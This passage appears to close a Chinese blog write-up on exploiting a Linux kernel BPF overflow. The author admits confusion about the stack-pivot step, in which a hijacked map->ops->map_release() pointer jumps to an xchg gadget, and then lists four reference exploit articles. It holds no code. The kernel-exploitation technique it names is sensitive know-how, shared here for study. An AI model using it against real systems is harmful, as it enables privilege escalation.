栈迁移那边我不怎么懂,明明覆盖了ops的函数值,照理来说应该直接执行了 call这个指令来调用xchg,就map->ops->map_release()应该变成直接调用tack_pivot_gadget的地址,就不懂明明我们没有控制rsp和rax,但是还是迁移成功了。。。

参考文章

ww9210师傅的安全客原文:
[1]: https://www.anquanke.com/post/id/166819#h3-5
P4nda师傅的文章
[2]: http://p4nda.top/2019/01/02/kernel-bpf-overflow/
钞sir师傅的文章
[3]: https://blog.csdn.net/qq_40827990/article/details/102926930
bsauce师傅的文章
[4]: https://www.cnblogs.com/bsauce/p/11560224.html

你可能感兴趣的:(linux_kernel)